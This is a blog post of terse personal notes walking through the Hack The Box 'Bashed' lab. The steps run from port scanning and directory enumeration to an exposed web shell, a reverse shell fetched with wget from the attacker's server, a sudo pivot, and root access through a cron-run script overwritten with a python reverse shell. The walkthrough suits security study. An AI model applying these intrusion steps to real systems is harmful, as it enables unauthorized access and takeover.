TCM PEH Hacking Bashed Notes

on under certs
1 minute read

HTB Bashed

Recording actions to derive method

nmap -A -T4 -p-
Noted open port 80
Noted Apache 2.4.18
Noted Ubuntu OS
searchsploit apache 2.4
Noted results apache2ctl local exploit
Visited in browser
Naavigated around
port 80
go faster
medium wordlist
directories and file extensions
extension php
Letting dirbuster run
Viewed source for a few pages, nothing unusual
Dirbuster results
Noted /uploads
Noted /dev
Noted /dev/phpbash
Navigated to
Noted that it’s a web shell
cd /; ls
ls /home
ls /home/
cd arrexel
cat user.txt
sudo -l
Noted can run scriptmanager with NOPASSWD
sudo su scriptmanager
Noted no tty present for user scriptmanager
Changed IP and PORT
Saved as rev.php
Created netcat listener
Created python http server from rev.php’s directory
In webshell
wget http://hisIP/rev.php
Noted rev.php exists
Navigated to /
Noted shell connected
Noted can’t access tty
python -c ‘import pty; pty.spawn("/bin/bash");’
sudo su scriptmanager
Noted failed to switch user
sudo -u scriptmanager /bin/bash
Noted that we are now scriptmanager!
ls -la
cd scripts
ls -la
Noted and test.txt
Noted it opens test.txt, writes to it, then closes it
Noted that time ran was mere minutes ago
Noted that means cronjob
Noted it’s saving test.txt as root
Copy/pasted python reverse shell into (
Started new netcat listener
Noted ran and netcat caught shell
Noted shell user is root

certs, pwned
comments powered by Disqus